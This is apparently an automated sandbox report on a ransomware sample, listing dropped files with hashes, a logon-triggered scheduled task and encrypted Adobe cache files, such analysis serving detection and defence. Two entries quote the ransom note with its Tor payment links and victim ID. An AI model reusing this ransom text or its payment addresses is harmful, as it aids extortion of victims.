                                                                                                                                                      Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true
                                                                                                                                                      C:\Users\user\AppData\Local\Temp\tmp9002.tmp
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1643
                                                                                                                                                      Entropy (8bit):5.193792141857937
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:2dH4+SEqC/Q7hxlNMFp1/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBmtn:cbh47TlNQ//rydbz9I3YODOLNdq3a
                                                                                                                                                      MD5:0B997C983C706527E9E713B8C39109A2
                                                                                                                                                      SHA1:5C76A174A004CFB0415790B8F3487E38E9957A19
                                                                                                                                                      SHA-256:9AE1F04B7C7749CD9973F8E90894908A66E2D31F3B4170B0553E362A2510CD52
                                                                                                                                                      SHA-512:44B3AC7FA13D97A4E5F02FFA60E96E03F6A300AA431D5AF3872FC08F28ABB37D329A7D7BD37DE61347F5C8D7A7305F73213EEFA63D6125B3B7504E2A9A46BDFC
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true
                                                                                                                                                      C:\Users\user\AppData\Local\Temp\tmpB7BE.tmp
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1643
                                                                                                                                                      Entropy (8bit):5.193792141857937
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:2dH4+SEqC/Q7hxlNMFp1/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBmtn:cbh47TlNQ//rydbz9I3YODOLNdq3a
                                                                                                                                                      MD5:0B997C983C706527E9E713B8C39109A2
                                                                                                                                                      SHA1:5C76A174A004CFB0415790B8F3487E38E9957A19
                                                                                                                                                      SHA-256:9AE1F04B7C7749CD9973F8E90894908A66E2D31F3B4170B0553E362A2510CD52
                                                                                                                                                      SHA-512:44B3AC7FA13D97A4E5F02FFA60E96E03F6A300AA431D5AF3872FC08F28ABB37D329A7D7BD37DE61347F5C8D7A7305F73213EEFA63D6125B3B7504E2A9A46BDFC
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true
                                                                                                                                                      C:\Users\user\AppData\Local\read-me.txt
                                                                                                                                                      Process:C:\Users\user\Desktop\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1440
                                                                                                                                                      Entropy (8bit):4.671361883788439
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:TyXWIBdatU+fZe1xzK8sevWAVgKTaCB7RZ0cHYIgtyUzn:Tl9U+fZe1xzCwgck38m
                                                                                                                                                      MD5:755028F7946D7FD0DF47A1AD5961143A
                                                                                                                                                      SHA1:89FF5F39E0E019A2C2068AE638C724711BABEE2D
                                                                                                                                                      SHA-256:A60B3DCDD12428D4683AD9E0434DDB915A9FDAE3DE6D5587D2FDA437BE7770F8
                                                                                                                                                      SHA-512:968C15F6358F2EDF5A47D842EEEB6D3B31BFEEEC5AE308F0C221FEB0648C44CFD1F64C6868DABEB5103D17149726921DEFF964A60213E05BBFE410FA05796957
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: All your files are Encrypted!..For data recovery needs decryptor...How to buy decryptor:..----------------------------------------------------------------------------------------....| 1. Download Tor browser - https://www.torproject.org/ and install it.....| 2. Open link in TOR browser - http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV.. ..| 3. Create Ticket....----------------------------------------------------------------------------------------....Note! This link is available via Tor Browser only.....------------------------------------------------------------..or..http://helpqvrg3cc5mvb3.onion/....Your ID.......67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 3
                                                                                                                                                      C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobData
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):976
                                                                                                                                                      Entropy (8bit):5.047241787554957
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:iSCzK8sevWAVgKTaCB7RZ0cHYIgtyUzF71:TCzCwgck38u71
                                                                                                                                                      MD5:F3CAD3522103C03E2712730B741E1683
                                                                                                                                                      SHA1:2C756631BA4A9E41A8A999F3AE3FF7A770FED35A
                                                                                                                                                      SHA-256:696AD3F9EBC221734C55AFF6A1CB36284F563E68BE5322E5A1ABEBFB150835D0
                                                                                                                                                      SHA-512:5B1AE87F940515860D975CEC64FA09555C9F156ED9256A63788C6E2682158E0A5078C0B0D6A52E5568C8D6EE7CB113CA2AE111C90DF27A29A58FD8D117742EDD
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ..../...+..2.hN.......J..Z..zp;L.K.9v......)_../.~:....q...(.j.).zH..P..].L$3.f.;3..rak......!T.h#.....5...=..D.!...|2....r..[.}.*..brE..^.....d.8...67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8 E2 A9 71 09 DD A0 98 32.E4 CF 64 F2 41 66 A4 8E FA DD 9C 6D 4A EF 7A F5.79 91 A5 31 FC 9B 61 4E 9C 5D 08 F9 41 2A 1E 74.06...}..P...,..s..>....&.#1b%P.8..(...w.RO..g.
                                                                                                                                                      C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobData.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):976
                                                                                                                                                      Entropy (8bit):5.047241787554957
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:iSCzK8sevWAVgKTaCB7RZ0cHYIgtyUzF71:TCzCwgck38u71
                                                                                                                                                      MD5:F3CAD3522103C03E2712730B741E1683
                                                                                                                                                      SHA1:2C756631BA4A9E41A8A999F3AE3FF7A770FED35A
                                                                                                                                                      SHA-256:696AD3F9EBC221734C55AFF6A1CB36284F563E68BE5322E5A1ABEBFB150835D0
                                                                                                                                                      SHA-512:5B1AE87F940515860D975CEC64FA09555C9F156ED9256A63788C6E2682158E0A5078C0B0D6A52E5568C8D6EE7CB113CA2AE111C90DF27A29A58FD8D117742EDD
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: ..../...+..2.hN.......J..Z..zp;L.K.9v......)_../.~:....q...(.j.).zH..P..].L$3.f.;3..rak......!T.h#.....5...=..D.!...|2....r..[.}.*..brE..^.....d.8...67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8 E2 A9 71 09 DD A0 98 32.E4 CF 64 F2 41 66 A4 8E FA DD 9C 6D 4A EF 7A F5.79 91 A5 31 FC 9B 61 4E 9C 5D 08 F9 41 2A 1E 74.06...}..P...,..s..>....&.#1b%P.8..(...w.RO..g.
                                                                                                                                                      C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobSettings
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):976
                                                                                                                                                      Entropy (8bit):5.033998184289333
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:AA61CpYAzK8sevWAVgKTaCB7RZ0cHYIgtyUzed:A71uzCwgck38hd
                                                                                                                                                      MD5:3605500BEA86E7B151DF782F38167516
                                                                                                                                                      SHA1:19056DD3EFEE24C01D273364DD88249B768D3B80
                                                                                                                                                      SHA-256:57390F90A285F5D9887CD78274164414381448CA98E1D613845AF072D37C6264
                                                                                                                                                      SHA-512:226A22F8CF1323070EC116139C514982A7F0ED0841CD1E6E7B49BACC5C2A342B3933C45E3402B98A7F7E9FC8DFFDCFCE38717545B1F6FFEAD824783AE08054A2
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .^&'..8CB. .S.l......$..|/...w.+.......T.1..w...|.......e.-.......c.......p....).q....{N.CvG...N<..x .."-;..< W...j/....tk...4..6..c..w....V.6...V.z67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8 E2 A9 71 09 DD A0 98 32.E4 CF 64 F2 41 66 A4 8E FA DD 9C 6D 4A EF 7A F5.79 91 A5 31 FC 9B 61 4E 9C 5D 08 F9 41 2A 1E 74..JRI..N......._..^.f..%n.]...<..{Q..a..s.UAL....
                                                                                                                                                      C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\JSCache\GlobSettings.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):976
                                                                                                                                                      Entropy (8bit):5.033998184289333
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:AA61CpYAzK8sevWAVgKTaCB7RZ0cHYIgtyUzed:A71uzCwgck38hd
                                                                                                                                                      MD5:3605500BEA86E7B151DF782F38167516
                                                                                                                                                      SHA1:19056DD3EFEE24C01D273364DD88249B768D3B80
                                                                                                                                                      SHA-256:57390F90A285F5D9887CD78274164414381448CA98E1D613845AF072D37C6264
                                                                                                                                                      SHA-512:226A22F8CF1323070EC116139C514982A7F0ED0841CD1E6E7B49BACC5C2A342B3933C45E3402B98A7F7E9FC8DFFDCFCE38717545B1F6FFEAD824783AE08054A2
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .^&'..8CB. .S.l......$..|/...w.+.......T.1..w...|.......e.-.......c.......p....).q....{N.CvG...N<..x .."-;..< W...j/....tk...4..6..c..w....V.6...V.z67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9 A2 AF 7F 0F F4 86 13 44 1F EF 77 E2 C0.E2 CF CF 82 7A 3E E5 7A D3 02 EB 7B B0 30 B9 D2.AC 29 2A AF EC C8 3D A9 AA B5 1D CE 27 B0 75 4C.5F 0D FC 69 CA 00 78 C4 6A F5 D2 6A C8 7A BF 10.6E 87 47 0F 27 E2 3D C8 E2 A9 71 09 DD A0 98 32.E4 CF 64 F2 41 66 A4 8E FA DD 9C 6D 4A EF 7A F5.79 91 A5 31 FC 9B 61 4E 9C 5D 08 F9 41 2A 1E 74..JRI..N......._..^.f..%n.]...<..{Q..a..s.UAL....
                                                                                                                                                      C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\JSCache\read-me.txt
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1440
                                                                                                                                                      Entropy (8bit):4.671361883788439
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:TyXWIBdatU+fZe1xzK8sevWAVgKTaCB7RZ0cHYIgtyUzn:Tl9U+fZe1xzCwgck38m
                                                                                                                                                      MD5:755028F7946D7FD0DF47A1AD5961143A
                                                                                                                                                      SHA1:89FF5F39E0E019A2C2068AE638C724711BABEE2D
                                                                                                                                                      SHA-256:A60B3DCDD12428D4683AD9E0434DDB915A9FDAE3DE6D5587D2FDA437BE7770F8
                                                                                                                                                      SHA-512:968C15F6358F2EDF5A47D842EEEB6D3B31BFEEEC5AE308F0C221FEB0648C44CFD1F64C6868DABEB5103D17149726921DEFF964A60213E05BBFE410FA05796957
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: All your files are Encrypted!..For data recovery needs decryptor...How to buy decryptor:..----------------------------------------------------------------------------------------....| 1. Download Tor browser - https://www.torproject.org/ and install it.....| 2. Open link in TOR browser - http://mmeeiix2ejdwkmseycljetmpiwebdvgjts75c63camjofn2cjdoulzqd.onion/?STAHYJUHGFV.. ..| 3. Create Ticket....----------------------------------------------------------------------------------------....Note! This link is available via Tor Browser only.....------------------------------------------------------------..or..http://helpqvrg3cc5mvb3.onion/....Your ID.......67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 3
                                                                                                                                                      C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1584
                                                                                                                                                      Entropy (8bit):6.607824095322613
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:rhQJiyPWjmV+qIgLUOX7vPO4VLncL2isHzK8sevWAVgKTaCB7RZ0cHYIgtyUz4fE:rCZoqTWNL27HzCwgck383E
                                                                                                                                                      MD5:989FE8D4111A1DE3125740A1C3FA3A97
                                                                                                                                                      SHA1:17A25264AABE574CB3557DA831FA9CB6A4F2AEAF
                                                                                                                                                      SHA-256:118C24921B0B1A1856BFE9314A847E4D3B8EB3D4F32B67D10E054D934A686BE8
                                                                                                                                                      SHA-512:A471703E9E41767C533672714783EA61D0161CFB3F996EBB44BECB798D46C1020CE8C91E4CFB5E3DCFECC81C1E452F152659CD56082BF2FE2A3AC5291FA41540
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: SE(..."5.:R.MJ..U(=...2..Al~...............l.-G....q &.[&.Ff7..e.....8N....!...J.s......nE.2mx...!.....l@.y....Q.nh....z-.....".4........{...-.J/L]i.(t.f....o...Q..:.p|o.U.C..P../n.L..&.S.g.. 4r.b(....zvS.tl..LG.l..f...K.|..v.~.Z.8.mh_...a.cb...o.WJ.l.E.xi11....~R.>..G...0...o...F....\e....e..s...F.........,*....3.)....K?..Vue.........*.P...3..........*.s.F.a.U.s.R.......8.[..^iSR..#....3.....jF..so)5.g.. .E.R..Y.#.....^..n..X.-....t0Y.}....[i.*.C.y..-.;j.;W}*.S>1j}....Y,...n.+1.....j..2$.b.X.Or......%.....Ua$+c.5..O..B.k..G.kC.1\L.z......d...0.............;..S...Ef.3..2..Lm............g..>..).K{|..H5i..>N...V.C9..9...`.!.-....LQ..GX..C..C..@................T..'_..(45.r..y...)..P..(]..rH).[H...m..Ey......:3.g...[...A.o|u.67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 3
                                                                                                                                                      C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\0FDED5CEB68C302B1CDB2BDDD9D0000E76539CB0.crl.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1584
                                                                                                                                                      Entropy (8bit):6.607824095322613
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:rhQJiyPWjmV+qIgLUOX7vPO4VLncL2isHzK8sevWAVgKTaCB7RZ0cHYIgtyUz4fE:rCZoqTWNL27HzCwgck383E
                                                                                                                                                      MD5:989FE8D4111A1DE3125740A1C3FA3A97
                                                                                                                                                      SHA1:17A25264AABE574CB3557DA831FA9CB6A4F2AEAF
                                                                                                                                                      SHA-256:118C24921B0B1A1856BFE9314A847E4D3B8EB3D4F32B67D10E054D934A686BE8
                                                                                                                                                      SHA-512:A471703E9E41767C533672714783EA61D0161CFB3F996EBB44BECB798D46C1020CE8C91E4CFB5E3DCFECC81C1E452F152659CD56082BF2FE2A3AC5291FA41540
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: SE(..."5.:R.MJ..U(=...2..Al~...............l.-G....q &.[&.Ff7..e.....8N....!...J.s......nE.2mx...!.....l@.y....Q.nh....z-.....".4........{...-.J/L]i.(t.f....o...Q..:.p|o.U.C..P../n.L..&.S.g.. 4r.b(....zvS.tl..LG.l..f...K.|..v.~.Z.8.mh_...a.cb...o.WJ.l.E.xi11....~R.>..G...0...o...F....\e....e..s...F.........,*....3.)....K?..Vue.........*.P...3..........*.s.F.a.U.s.R.......8.[..^iSR..#....3.....jF..so)5.g.. .E.R..Y.#.....^..n..X.-....t0Y.}....[i.*.C.y..-.;j.;W}*.S>1j}....Y,...n.+1.....j..2$.b.X.Or......%.....Ua$+c.5..O..B.k..G.kC.1\L.z......d...0.............;..S...Ef.3..2..Lm............g..>..).K{|..H5i..>N...V.C9..9...`.!.-....LQ..GX..C..C..@................T..'_..(45.r..y...)..P..(]..rH).[H...m..Ey......:3.g...[...A.o|u.67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 3
                                                                                                                                                      C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1376
                                                                                                                                                      Entropy (8bit):6.269680410696204
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:ndCpVlxdQTZsYhnDo1VAef7F0ZgtzK8sevWAVgKTaCB7RZ0cHYIgtyUz1UgbB:nQzlxuOYqXAefZ0itzCwgck38cr
                                                                                                                                                      MD5:0FFBEF101995A91EB5F78B3BB44E0BAB
                                                                                                                                                      SHA1:C854F9D8D74585DF4E8CF4D207546068515804A3
                                                                                                                                                      SHA-256:887893705E571FE41FBAA6DE69D82FB7CB87CAFB809F086A54755C698DA6DF6C
                                                                                                                                                      SHA-512:A5B60A836FC736C207FDA278B64842CCEDB6DA5E98FD7750787DC05DE73461CB7FF1DD3D41D62587595C25522B190737AE2721B687D9A10EA546AA4DB747510D
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: K.v.it..*...E...Wg...0..;,xBI.@p.!..Jz..].l.2...........:/.R.v?..,..x,...7...].....?.....Ou..}t.p...F..r...a.[...6je3.7......j${..j..p.e..a.....Q.(...Y.+lK.J.2.L....'7!..0........[..}.../...j.!...6.K...0!.6.....A..WVq../1...P.\...".PJ!..qE...~.-C...5..D../=9.z.....f*....uE*......A........`|...? .:.......s..C.......WX..`u........K,.n.2....'z.]....Gc.H..\l.;d.....s..9.>N.....y.<W....W.[..$-...1.....*...l..vZ&c..35...V.)..QLG..I0....Q.9.O.H.w.}F..!...e!l....g-_52p.......8+.\....k.+.n.....H]..R.b.l.e.....$..\..A.....K.TY....H.67 0D B5 3D F6 72 46 45 EA F4 35 88 36 1B D3 0A.A4 5C F3 89 B8 97 4A A6 3B 8D 1B 03 20 3F 20 FB.A9 A9 BB F7 1D 8A 3E F3 F5 4C F1 75 40 F0 F9 40.E7 0E 1A F5 A6 2C 34 4E EA 7E 57 FF C3 B0 D4 66.C0 3A 96 97 4F D7 A5 2E F8 34 8C 85 9D 35 0D 82.5C C4 72 95 44 72 E0 8C 13 47 E1 4B E4 06 9C 9C.92 37 F5 A5 82 7E BD B8 8B 53 FC 81 5E 36 04 9D.12 19 C5 B3 01 AC 42 2A DA 75 B7 FF E0 DC A7 A0.72 7A 63 F5 DF D6 CF 9A 1F 22 EF B3 5F 90 95 5D.30 CC D9
                                                                                                                                                      C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\CE338828149963DCEA4CD26BB86F0363B4CA0BA5.crl.xls (copy)
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Mm7Yq5V7Lu.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1376
                                                                                                                                                      Entropy (8bit):6.269680410696204
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:ndCpVlxdQTZsYhnDo1VAef7F0ZgtzK8sevWAVgKTaCB7RZ0cHYIgtyUz1UgbB:nQzlxuOYqXAefZ0itzCwgck38cr
                                                                                                                                                      MD5:0FFBEF101995A91EB5F78B3BB44E0BAB
                                                                                                                                                      SHA1:C854F9D8D74585DF4E8CF4D207546068515804A3
                                                                                                                                                      SHA-256:887893705E571FE41FBAA6DE69D82FB7CB87CAFB809F086A54755C698DA6DF6C
                                                                                                                                                      SHA-512:A5B60A836FC736C207FDA278B64842CCEDB6DA5E98FD7750787DC05DE73461CB7FF1DD3D41D62587595C25522B190737AE2721B687D9A10EA546AA4DB747510D
                                                                                                                                                      Malicious:false
